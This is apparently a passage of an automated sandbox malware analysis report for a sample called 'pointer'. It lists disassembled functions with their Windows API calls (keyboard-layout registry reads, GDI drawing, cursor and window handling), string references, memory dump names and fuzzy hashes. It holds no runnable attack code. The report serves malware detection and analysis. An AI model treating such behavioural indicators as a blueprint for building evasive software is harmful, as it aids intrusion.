Part of subcall function 02D1DC14: SetErrorMode.KERNEL32 ref: 02D1DC1E
Part of subcall function 02D1DC14: LoadLibraryA.KERNEL32(00000000,00000000,02D1DC68,?,00000000,02D1DC86), ref: 02D1DC4D

GetProcAddress.KERNEL32(?,KbdLayerDescriptor), ref: 02D4306D
FreeLibrary.KERNEL32(?,02D430A7,?,00000000,02D430E7), ref: 02D4309A

Strings

KbdLayerDescriptor, xrefs: 02D43064
\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\, xrefs: 02D43021
Layout File, xrefs: 02D43039

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Library$AddressCloseErrorFreeKeyboardLayoutLoadModeNameOpenProc
String ID: KbdLayerDescriptor$Layout File$\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\
API String ID: 3365787578-2194312379
Opcode ID: 802f005931024a3e5c6c94a9e13e2c8e24ce6e6653c8901f3100fdab0f6d858d
Instruction ID: 610a040bfa6309fc9753ed5c0a38a6ea1fa481cc512bcdc8407678d071ac58f1
Opcode Fuzzy Hash: 802f005931024a3e5c6c94a9e13e2c8e24ce6e6653c8901f3100fdab0f6d858d
Instruction Fuzzy Hash: 2B21B375E00249AFEB01EFA8E85199EB7BBFB49700F6185A4E400A7700DB79AD45CF60

Uniqueness

Uniqueness Score: -1.00%

Function 02D3B098 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68stringCOMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 02D3B0F0
GetSystemMetrics.USER32(00000000), ref: 02D3B105
GetSystemMetrics.USER32(00000001), ref: 02D3B110
lstrcpyA.KERNEL32(?,DISPLAY), ref: 02D3B13A

Part of subcall function 02D3AC98: GetProcAddress.KERNEL32(75BD0000,00000000), ref: 02D3AD17

Strings

GetMonitorInfoA, xrefs: 02D3B0B0
DISPLAY, xrefs: 02D3B131

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: System$Metrics$AddressInfoParametersProclstrcpy
String ID: DISPLAY$GetMonitorInfoA
API String ID: 2545840971-1370492664
Opcode ID: 6669d783fff6227e5047ef7022b72ec19663a0a5dc572ebbb23f9be1a9f32c2f
Instruction ID: 29acf9eb251107406ce1d505ff7233db0c240dec7eb1de0d7bf8c6bc25f08747
Opcode Fuzzy Hash: 6669d783fff6227e5047ef7022b72ec19663a0a5dc572ebbb23f9be1a9f32c2f
Instruction Fuzzy Hash: 0411D071B403009FE722CF65DC44BA7BBEAEB46318F00092AED5A97740D3B0AC54CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02D3B16C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68stringCOMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 02D3B1C4
GetSystemMetrics.USER32(00000000), ref: 02D3B1D9
GetSystemMetrics.USER32(00000001), ref: 02D3B1E4
lstrcpyA.KERNEL32(?,DISPLAY), ref: 02D3B20E

Part of subcall function 02D3AC98: GetProcAddress.KERNEL32(75BD0000,00000000), ref: 02D3AD17

Strings

GetMonitorInfoW, xrefs: 02D3B184
DISPLAY, xrefs: 02D3B205

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: System$Metrics$AddressInfoParametersProclstrcpy
String ID: DISPLAY$GetMonitorInfoW
API String ID: 2545840971-2774842281
Opcode ID: 83aa2dee21a75cf14e318e06e5490644960d05282c23e0f9cdbe300b7dcfb404
Instruction ID: 53c2b88d3309684e98ab4b6f6e87c319723a67fd32a0abb5c817c0c227033880
Opcode Fuzzy Hash: 83aa2dee21a75cf14e318e06e5490644960d05282c23e0f9cdbe300b7dcfb404
Instruction Fuzzy Hash: 2F119375A803005FD7219F64DC44BABB7EAFB46718F009A2AED569B740D7B0AD04CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02D34E68 Relevance: 10.6, APIs: 7, Instructions: 66COMMON

Download Yara Rule

APIs

Part of subcall function 02D33C90: GetObjectA.GDI32(?,00000004), ref: 02D33CA7
Part of subcall function 02D33C90: GetPaletteEntries.GDI32(?,00000000,?,?), ref: 02D33CCA

GetDC.USER32(00000000), ref: 02D34EA6
CreateCompatibleDC.GDI32(?), ref: 02D34EB2
SelectObject.GDI32(?), ref: 02D34EBF
SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,02D34F17,?,?,?,?,00000000), ref: 02D34EE3
SelectObject.GDI32(?,?), ref: 02D34EFD
DeleteDC.GDI32(?), ref: 02D34F06
ReleaseDC.USER32(00000000,?), ref: 02D34F11

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Object$Select$ColorCompatibleCreateDeleteEntriesPaletteReleaseTable
String ID:
API String ID: 4046155103-0
Opcode ID: 437823ef75eea07585aed80dc9d42fe24b61bb650f4b20bc72faf13ded1c35ee
Instruction ID: e8b9286ecf91e8491bbbc716d62d1b02cd49fae39673647f4bda01e38c580273
Opcode Fuzzy Hash: 437823ef75eea07585aed80dc9d42fe24b61bb650f4b20bc72faf13ded1c35ee
Instruction Fuzzy Hash: 17112EB1E04258BBDB11EBE8DC50AAEB7BDEB08704F0484A5B504D7780D675DD40CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02D61C34 Relevance: 10.6, APIs: 7, Instructions: 57threadwindowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32 ref: 02D61C4F
WindowFromPoint.USER32(?,?), ref: 02D61C5C
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 02D61C6A
GetCurrentThreadId.KERNEL32 ref: 02D61C71
SendMessageA.USER32(00000000,00000084,00000000,?), ref: 02D61C9A
SendMessageA.USER32(00000000,00000020,00000000,?), ref: 02D61CAC
SetCursor.USER32(00000000), ref: 02D61CBE

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
String ID:
API String ID: 1770779139-0
Opcode ID: 417290bb009e3f38af225b5d7cb1e7cd9f9ccfaf7d2369ba41331393bfd119bd
Instruction ID: 616a3da1ce66aa546bc123675c7303d96fe92b2803acddf88f1ede01a2413e4b
Opcode Fuzzy Hash: 417290bb009e3f38af225b5d7cb1e7cd9f9ccfaf7d2369ba41331393bfd119bd
Instruction Fuzzy Hash: 1501F52510435077DB206B749E84F7FB6AADFC0B40F004559B9889A7A0E735CC01E776

Uniqueness

Uniqueness Score: -1.00%

Function 02D1BFD4 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 02D1BE4C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02D1BE69
Part of subcall function 02D1BE4C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02D1BE8D
Part of subcall function 02D1BE4C: GetModuleFileNameA.KERNEL32(02D10000,?,00000105), ref: 02D1BEA8
Part of subcall function 02D1BE4C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02D1BF3E

CharToOemA.USER32(?,?), ref: 02D1C00B
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02D1C028
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02D1C02E
GetStdHandle.KERNEL32(000000F4,02D1C098,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02D1C043
WriteFile.KERNEL32(00000000,000000F4,02D1C098,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02D1C049
LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02D1C06B
MessageBoxA.USER32(00000000,?,?,00002010), ref: 02D1C081

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
String ID:
API String ID: 185507032-0
Opcode ID: bb8ba07633c3c14f8d31add2d88942d62786ca5a963b65ffb259579d92333bfb
Instruction ID: 75d20466dc02b540b23ed6d12390ef8017e8e84aac1ad8939276203d679c45f7
Opcode Fuzzy Hash: bb8ba07633c3c14f8d31add2d88942d62786ca5a963b65ffb259579d92333bfb
Instruction Fuzzy Hash: 99114CB2594200BAD200EBA4EC44F9BB7EEEB45700F404916B754D66D0DA35DD44CBB6

Uniqueness

Uniqueness Score: -1.00%

Function 02D5CA18 Relevance: 9.2, APIs: 6, Instructions: 150COMMON

Download Yara Rule

APIs

FillRect.USER32(?,?), ref: 02D5CA91
GetClientRect.USER32(00000000,?), ref: 02D5CABC
FillRect.USER32(?,?,00000000), ref: 02D5CADB

Part of subcall function 02D5C98C: CallWindowProcA.USER32(?,?,?,?,?), ref: 02D5C9C6

BeginPaint.USER32(?,?), ref: 02D5CB53
GetWindowRect.USER32(?,?), ref: 02D5CB80
EndPaint.USER32(?,?,02D5CBF4), ref: 02D5CBE0

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Rect$FillPaintWindow$BeginCallClientProc
String ID:
API String ID: 901200654-0
Opcode ID: 5a70ffe0a92a1ce78fb2275443285a6c4ffb265d5391ed404496e0b6d91ea996
Instruction ID: 188104271174d2760b17c4a59804f9e3e1af0ce8fd2320ea0dd90fc4534889b8
Opcode Fuzzy Hash: 5a70ffe0a92a1ce78fb2275443285a6c4ffb265d5391ed404496e0b6d91ea996
Instruction Fuzzy Hash: 3151C374A14618EFCF10DBA8C588E9DBBF9EB08314F2481A6E818EB351D774AE44DF50

Uniqueness

Uniqueness Score: -1.00%

Function 02D1F908 Relevance: 9.1, APIs: 6, Instructions: 139COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02D1F9A1
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02D1F9BD
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02D1F9F6
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02D1FA73
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02D1FA8C
VariantCopy.OLEAUT32(?,00000000), ref: 02D1FAC1

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-0
Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
Instruction ID: 8deddda568269e0b81d07f04547e17a0d23adfa61051bab4b893c1b1d64d8ccd
Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
Instruction Fuzzy Hash: B651E9B6900629AFCB26EB58E890BD9B3BDEF48300F0041D5E548E7B11D634AF858F61

Uniqueness

Uniqueness Score: -1.00%

Function 02D2D6F4 Relevance: 9.1, APIs: 6, Instructions: 109threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 02D2D6FF
GetCurrentThreadId.KERNEL32 ref: 02D2D70E

Part of subcall function 02D2D6CC: ResetEvent.KERNEL32(00000318,02D2D749), ref: 02D2D6D2

EnterCriticalSection.KERNEL32(02DAD2EC), ref: 02D2D753
InterlockedExchange.KERNEL32(02D7AAF0,?), ref: 02D2D76F
LeaveCriticalSection.KERNEL32(02DAD2EC,00000000,02D2D89A,?,00000000,02D2D8B9,?,02DAD2EC), ref: 02D2D7C8
EnterCriticalSection.KERNEL32(02DAD2EC,02D2D844,02D2D89A,?,00000000,02D2D8B9,?,02DAD2EC), ref: 02D2D837

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: CriticalSection$CurrentEnterThread$EventExchangeInterlockedLeaveReset
String ID:
API String ID: 2189153385-0
Opcode ID: 36938ad9f3a46c92d14832bbc6363671166593710010a467e45899b7c59ca74d
Instruction ID: 3c9feaeba4d524a3f4b5464018fbc6877902b2ff461a8f8070026693e22f9809
Opcode Fuzzy Hash: 36938ad9f3a46c92d14832bbc6363671166593710010a467e45899b7c59ca74d
Instruction Fuzzy Hash: 85319D30A08754AFF711EFA4E850A6DBBFBEB59B08F5184B0E402D3B50D7799C48CA61

Uniqueness

Uniqueness Score: -1.00%

Function 02D33F40 Relevance: 9.1, APIs: 6, Instructions: 84COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000000B), ref: 02D33F8E
GetSystemMetrics.USER32(0000000C), ref: 02D33F9A
GetDC.USER32(00000000), ref: 02D33FB6
GetDeviceCaps.GDI32(00000000,0000000E), ref: 02D33FDD
GetDeviceCaps.GDI32(00000000,0000000C), ref: 02D33FEA
ReleaseDC.USER32(00000000,00000000), ref: 02D34023

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: CapsDeviceMetricsSystem$Release
String ID:
API String ID: 447804332-0
Opcode ID: 401314ab780d8d02380e1116fdbcf986e42df2b05a8967f1c74c9727b9c143db
Instruction ID: 29b2c464f7b1a9f224b63dbcac68dca1b515f89d71ad31620e30c1a800e45a14
Opcode Fuzzy Hash: 401314ab780d8d02380e1116fdbcf986e42df2b05a8967f1c74c9727b9c143db
Instruction Fuzzy Hash: 72316D74A00208EFEB01DFA5C940AAEFBB5FB49310F108165F914AB794D7759D40CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02D343A0 Relevance: 9.1, APIs: 6, Instructions: 65windowCOMMON

Download Yara Rule

APIs

Part of subcall function 02D3424C: GetObjectA.GDI32(?,00000054), ref: 02D34260

CreateCompatibleDC.GDI32(00000000), ref: 02D343C2
SelectPalette.GDI32(?,?,00000000), ref: 02D343E3
RealizePalette.GDI32(?), ref: 02D343EF
GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 02D34406
SelectPalette.GDI32(?,00000000,00000000), ref: 02D3442E
DeleteDC.GDI32(?), ref: 02D34437

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Palette$Select$BitsCompatibleCreateDeleteObjectRealize
String ID:
API String ID: 1221726059-0
Opcode ID: c9c2dbc923cdef8e599226089e945ffabe3d4f1d76ea5c30f23582f13013bc35
Instruction ID: 9896847a463f22d8506793ba3b2d780467dcbd559c51a186327bf605d1095780
Opcode Fuzzy Hash: c9c2dbc923cdef8e599226089e945ffabe3d4f1d76ea5c30f23582f13013bc35
Instruction Fuzzy Hash: 6F113A75A04208BBEB11DBA9EC80F9EB7FDEF48710F5184A4B514E7790E674DD008B64

Uniqueness

Uniqueness Score: -1.00%

Function 02D33BEC Relevance: 9.1, APIs: 6, Instructions: 56windowCOMMON

Download Yara Rule

APIs

CreateCompatibleDC.GDI32(00000000), ref: 02D33C05
SelectObject.GDI32(00000000,00000000), ref: 02D33C0E
GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,02D3618B,?,?,?,?,02D34D03), ref: 02D33C22
SelectObject.GDI32(00000000,00000000), ref: 02D33C2E
DeleteDC.GDI32(00000000), ref: 02D33C34
CreatePalette.GDI32 ref: 02D33C7B

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: CreateObjectSelect$ColorCompatibleDeletePaletteTable
String ID:
API String ID: 2515223848-0
Opcode ID: 508c836092bd0663bed50eba9eaf11838a299159751b88aa2a51f292bcd0b40a
Instruction ID: a055649ef829e6b8182561f87cb193113031b8563f94972921fa368e3c4eca34
Opcode Fuzzy Hash: 508c836092bd0663bed50eba9eaf11838a299159751b88aa2a51f292bcd0b40a
Instruction Fuzzy Hash: 19018C6120431076E615B76AED42BAB72BEDFC0B14F04C869B5889B381E679CC85C7E6

Uniqueness

Uniqueness Score: -1.00%

Function 02D332D4 Relevance: 9.0, APIs: 6, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 02D32A9C: CreateBrushIndirect.GDI32(?), ref: 02D32B47

UnrealizeObject.GDI32(00000000), ref: 02D332E0
SelectObject.GDI32(?,00000000), ref: 02D332F2
SetBkColor.GDI32(?,00000000), ref: 02D33315
SetBkMode.GDI32(?,00000002), ref: 02D33320
SetBkColor.GDI32(?,00000000), ref: 02D3333B
SetBkMode.GDI32(?,00000001), ref: 02D33346

Part of subcall function 02D31CE0: GetSysColor.USER32(?), ref: 02D31CEA

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
String ID:
API String ID: 3527656728-0
Opcode ID: 000549d32ddbd72643fa0bc01a3c79da0170c14acb9586ca5784ae469711f634
Instruction ID: 174586e1bdf1b069bcb93f8d15a38ed8dda97fa59cc91a7da4ed7178ee861746
Opcode Fuzzy Hash: 000549d32ddbd72643fa0bc01a3c79da0170c14acb9586ca5784ae469711f634
Instruction Fuzzy Hash: 12F06B75601200ABDA41FFB8EAC5E0B67AEEF08741B048590B908DF756CA25ED509FB1

Uniqueness

Uniqueness Score: -1.00%

Function 02D136D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02D136F2
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02D13741,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02D13725
RegCloseKey.ADVAPI32(?,02D13748,00000000,?,00000004,00000000,02D13741,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02D1373B

Strings

SOFTWARE\Borland\Delphi\RTL, xrefs: 02D136E8
FPUMaskValue, xrefs: 02D1371C

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3677997916-4173385793
Opcode ID: c0029fc800a2d5d608c83900b5bf7291327193ad6012f8939cfaa0645c5f561d
Instruction ID: e4fd7e9483b8b82163fb7a7e1de0ed65976e00ef862529753a8cac176d72db86
Opcode Fuzzy Hash: c0029fc800a2d5d608c83900b5bf7291327193ad6012f8939cfaa0645c5f561d
Instruction Fuzzy Hash: 8101B5B5A40348BAFB11DB90FD42BBD77ECDB08B01F6044A1BA04E6B80E6799D14CB64

Uniqueness

Uniqueness Score: -1.00%

Function 02D5BAE4 Relevance: 7.7, APIs: 5, Instructions: 181COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00000000,00000060,00000000), ref: 02D5BBB7
MulDiv.KERNEL32(?,00000000,00000000), ref: 02D5BC46
MulDiv.KERNEL32(?,00000000,00000000), ref: 02D5BC75
MulDiv.KERNEL32(?,00000000,00000000), ref: 02D5BCA4
MulDiv.KERNEL32(?,00000000,00000000), ref: 02D5BCC7

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d12069262ea4bd80198e6b8de71ab8c8af136550dbad048b7a72c86e9116ae29
Instruction ID: dc530d03664fe174912812f8ceba7d028833e8012425b62318d455880b942ec6
Opcode Fuzzy Hash: d12069262ea4bd80198e6b8de71ab8c8af136550dbad048b7a72c86e9116ae29
Instruction Fuzzy Hash: C9818434A00254EFDB44DB69C688EADB7FAEF49304F2541E5E808DB365CB74AE41DB50

Uniqueness

Uniqueness Score: -1.00%

Function 02D5D688 Relevance: 7.7, APIs: 5, Instructions: 174windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(00000000), ref: 02D5D7AC
SetMenu.USER32(00000000,00000000), ref: 02D5D7C9
SetMenu.USER32(00000000,00000000), ref: 02D5D7FE
SetMenu.USER32(00000000,00000000), ref: 02D5D81A

Part of subcall function 02D1669C: LoadStringA.USER32(00000000,0000FFF3,?,00001000), ref: 02D166CE

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000037), ref: 02D5D861

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Menu$LoadStringWindow
String ID:
API String ID: 1738039741-0
Opcode ID: 95069a9764b1a198059935c6c96dcaa7f0bb0f48081f1df9a8479e5c16c49c90
Instruction ID: 9a6e7e56a749058db2ad020c7d10f79d19f8931019589335071ace05a85f7ba7
Opcode Fuzzy Hash: 95069a9764b1a198059935c6c96dcaa7f0bb0f48081f1df9a8479e5c16c49c90
Instruction Fuzzy Hash: DD515F30A042645BDF25AF788C8875A6B97EF04744F1444B5EC499B796CBF8DC49CB70

Uniqueness

Uniqueness Score: -1.00%

Function 02D3FEDC Relevance: 7.7, APIs: 5, Instructions: 168COMMON

Download Yara Rule

APIs

DrawEdge.USER32(00000000,?,00000006,00000002), ref: 02D3FFAB
OffsetRect.USER32(?,00000001,00000001), ref: 02D3FFFC
DrawTextA.USER32(00000000,00000000,?,?,?), ref: 02D40035
OffsetRect.USER32(?,000000FF,000000FF), ref: 02D40042
DrawTextA.USER32(00000000,00000000,?,?,?), ref: 02D400AD

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Draw$OffsetRectText$Edge
String ID:
API String ID: 3610532707-0
Opcode ID: 8e7e1cc80aac08c6d0dbdfd698061a34665be99ec7da9b27b7dc99e8f03f62ec
Instruction ID: 76e595989665dd186e3c7b5a90f219325433b77d04296eedc7c4b71ebdc4a3e3
